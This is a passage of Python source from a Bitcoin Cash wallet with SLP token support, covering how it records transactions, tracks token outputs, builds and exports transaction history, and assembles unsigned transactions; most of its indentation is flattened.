if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
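# Record a spend whose funding output isn't known to us yet; also notify the cleaner thread so entries that turn out to be irrelevant can be reaped later.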
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
### SLP: Handle incoming SLP transaction outputs here
self.handleSlpTransaction(tx_hash, tx)
"""
Callers are expected to take lock(s). We take no locks
"""
def handleSlpTransaction(self, tx_hash, tx):
txouts = tx.outputs()
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
token_type = 'SLP%d'%(e.args[0],)
for i, (_type, addr, _) in enumerate(txouts):
if _type == TYPE_ADDRESS and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': token_type,
'qty': None,
'token_id': None,
}
return
except (SlpParsingError, IndexError, OpreturnError):
return
if slpMsg.transaction_type == 'SEND':
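# SEND: the OP_RETURN quantity list is indexed by output position; record the quantities paid to our addresses.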
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# truncate outputs list
amounts = slpMsg.op_return_fields['token_output'][:len(txouts)]
for i, qty in enumerate(amounts):
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS and qty > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': qty,
}
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx_hash
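# GENESIS: vout 1 receives the initial mint quantity; the optional mint baton vout is recorded with qty 'MINT_BATON'.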
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['initial_token_mint_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['initial_token_mint_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == "MINT":
token_id_hex = slpMsg.op_return_fields['token_id_hex']
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['additional_token_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['additional_token_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == 'COMMIT':
# ignore COMMIT messages, they don't produce any tokens.
return
else:
raise RuntimeError(slpMsg.transaction_type)
# On receiving a new SEND, MINT, or GENESIS always add entry to token_types if wallet hasn't seen tokenId yet
if slpMsg.transaction_type in [ 'SEND', 'MINT', 'GENESIS' ]:
if slpMsg.transaction_type == 'GENESIS':
tokenid = tx_hash
else:
tokenid = slpMsg.op_return_fields['token_id_hex']
new_token = True
for k, v in self.tx_tokinfo.items():
try:
if v['token_id'] == tokenid:
new_token = False
except KeyError:
pass
if new_token and tokenid not in self.token_types:
tty = { 'class': 'SLP%d'%(slpMsg.token_type,),
'decimals': "?",
'name': 'unknown-' + tokenid[:6]
}
if slpMsg.token_type == 65:
tty['group_id'] = "?"
self.token_types[tokenid] = tty
# Always add entry to tx_tokinfo
tti = { 'type':'SLP%d'%(slpMsg.token_type,),
'transaction_type':slpMsg.transaction_type,
'token_id': token_id_hex,
'validity': 0,
}
self.tx_tokinfo[tx_hash] = tti
if self.is_slp: # Only start up validation if SLP enabled
self.slp_check_validation(tx_hash, tx)
def revalidate(self, tx_hash, tx):
tti = self.tx_tokinfo[tx_hash]
tti['validity'] = 0
self.slp_check_validation(tx_hash, tx)
slp_gs_mgr.slp_validity_signal.emit(tx_hash, tti['validity'])
def slp_check_validation(self, tx_hash, tx):
""" Callers are expected to take lock(s). We take no locks """
tti = self.tx_tokinfo[tx_hash]
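# validity codes: 0 = unknown (queued for validation), 1 = valid DAG, >1 = invalid for various reasons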
try:
is_new = self.token_types[tti['token_id']]['decimals'] == '?'
except:
is_new = False
if tti['validity'] == 0 and tti['token_id'] in self.token_types and not is_new and tti['type'] in ['SLP1','SLP65','SLP129']:
def callback(job):
(txid,node), = job.nodes.items()
val = node.validity
tti['validity'] = val
if slp_gs_mgr.slp_validity_signal is not None:
slp_gs_mgr.slp_validity_signal.emit(txid, val)
if slp_gs_mgr.slpdb_validation_enabled:
try:
result = slp_slpdb_validator.check_validity(tx_hash)
if result >= slp_gs_mgr.slpdb_confirmations:
tti['validity'] = 1
return
else:
tti['validity'] = 2
return
except Exception as e:
raise Exception(f"Exception: {str(e)}")
if tti['type'] in ['SLP1']:
job = self.slp_graph_0x01.make_job(tx, self, self.network,
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
elif tti['type'] in ['SLP65', 'SLP129']:
job = self.slp_graph_0x01_nft.make_job(tx, self, self.network, nft_type=tti['type'],
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
if job is not None:
job.add_callback(callback)
# This was commented out because it spammed the log so badly
# it impacted performance. SLP validation can create a *lot* of jobs!
#finalization_print_error(job, f"[{self.basename()}] Job for {tx_hash} type {tti['type']} finalized")
def rebuild_slp(self,):
"""Wipe away old SLP transaction data and rerun on the entire tx set.
"""
with self.lock:
self._slp_txo = defaultdict(lambda: defaultdict(dict))
self.tx_tokinfo = {}
for txid, tx in self.transactions.items():
self.handleSlpTransaction(txid, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
self.tx_fees.pop(tx_hash, None)
self.tx_tokinfo[tx_hash] = {}
for addr, addrdict in self._slp_txo.items():
if tx_hash in addrdict: addrdict[tx_hash] = {}
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
def receive_history_callback(self, addr, hist, tx_fees):
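# Receives the server-side history for addr (via the synchronizer): prune txs that no address references anymore, then register the new/updated entries.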
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_slp_history(self, domain=None, validities_considered=(None,0,1)):
history = []
histories = self.get_slp_histories(domain=domain, validities_considered=validities_considered)
# Take separate token histories and flatten them, then sort them.
for token_id,t_history in histories.items():
for tx_hash, height, conf, timestamp, delta in t_history:
history.append((tx_hash, height, conf, timestamp, delta, token_id))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
return history
def get_slp_histories(self, domain=None, validities_considered=(0,1)):
# Based on get_history.
# We return a dict of histories, one history per token_id.
# get domain
if domain is None:
domain = self.get_addresses()
#1. Big iteration to find all deltas and put them in the right place.
token_tx_deltas = defaultdict(lambda: defaultdict(int)) # defaultdict of defaultdicts of ints :)
for addr in domain:
h = self.get_address_history(addr)
with self.lock:
addrslptxo = self._slp_txo[addr]
for tx_hash, height in h:
if tx_hash in self.pruned_txo.values():
continue
tti = self.tx_tokinfo.get(tx_hash)
if tti and tti['validity'] in validities_considered:
txdict = addrslptxo.get(tx_hash,{})
for idx,d in txdict.items():
if isinstance(d['qty'],int):
token_tx_deltas[d['token_id']][tx_hash] += d['qty'] # received!
# scan over all txi's, trying to find if they were tokens, which tokens, and how much
# (note that non-SLP txes can spend (burn) SLP --- and SLP of tokenA can burn tokenB)
for n, _ in self.txi.get(tx_hash, {}).get(addr, ()):
prevtxid, prevout_str = n.rsplit(':',1)
tti = self.tx_tokinfo.get(prevtxid)
if not (tti and tti['validity'] in validities_considered):
continue
prevout = int(prevout_str)
d = addrslptxo.get(prevtxid,{}).get(prevout,{})
if isinstance(d.get('qty',None),int):
token_tx_deltas[d['token_id']][tx_hash] -= d['qty'] # spent!
# 2. create history (no sorting needed since balances won't be computed)
histories = {}
for token_id, tx_deltas in token_tx_deltas.items():
history = histories[token_id] = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
# 3. At this point we could compute running balances, but let's not.
return histories
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
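# history is sorted newest-first, so start from the current total and subtract each delta to get the balance as of each tx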
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab bch history
h = self.get_history(domain, reverse=True)
out = []
# grab slp history
_slp_h = self.get_slp_history(domain=domain, validities_considered=(None,0,1,2,3,4))
def fmt_slp_amt(v, decimals):
if v is None:
return '--'
if decimals == "?":
decimals = 0
return format_satoshis(v, decimal_point=int(decimals), is_diff=True)
def get_token_info(token_id):
return self.token_types.get(token_id, {
'class': '?',
'decimals': 0,
'name': 'unknown'
})
slp_h = dict((tx_hash, { \
'value': fmt_slp_amt(delta, get_token_info(token_id)['decimals']), \
'token_id': token_id, \
'name': get_token_info(token_id)['name'] \
}) for tx_hash, _, _, _, delta, token_id in _slp_h)
def get_slp_tx(tx_hash):
if slp_h.get(tx_hash) is None:
return { 'value': '--', 'name': '--', 'token_id': '--' }
return slp_h.get(tx_hash)
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
slp_info = get_slp_tx(tx_hash)
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
'slp_value' : slp_info['value'],
'slp_name' : slp_info['name'],
'slp_token_id' : slp_info['token_id']
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr is None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
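# Returns (status, status_str): statuses 0-3 are unconfirmed/unverified states taken from TX_STATUS; 4-9 encode min(confirmations, 6) and display the block time.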
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def check_sufficient_slp_balance(self, slpMessage, config):
if self.is_slp:
if slpMessage.transaction_type == 'SEND':
total_token_out = sum(slpMessage.op_return_fields['token_output'])
valid_token_balance, _, _, valid_unfrozen_token_balance, _ = self.get_slp_token_balance(slpMessage.op_return_fields['token_id_hex'], config)
if total_token_out > valid_token_balance:
raise NotEnoughFundsSlp()
elif total_token_out > valid_unfrozen_token_balance:
raise NotEnoughUnfrozenFundsSlp()
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None, *, mandatory_coins=[]):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
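        # An output amount of '!' is the "spend max" sentinel used below: the loop
        # records its index in i_max and rejects more than one such output.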
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
for item in mandatory_coins:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [self.get_addresses()[0]]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr,
mandatory_coins=mandatory_coins)
else:
inputs = mandatory_coins + inputs
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
        tx_in_bytes = tx.estimated_size()
        fee_in_satoshis = tx.get_fee()
        sats_per_byte = fee_in_satoshis / tx_in_bytes
        if sats_per_byte > 50:
            raise ExcessiveFee()
# Sort the inputs and outputs deterministically
if not mandatory_coins:
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def make_unsigned_transaction_for_bitcoinfiles(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info_for_bitcoinfiles(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
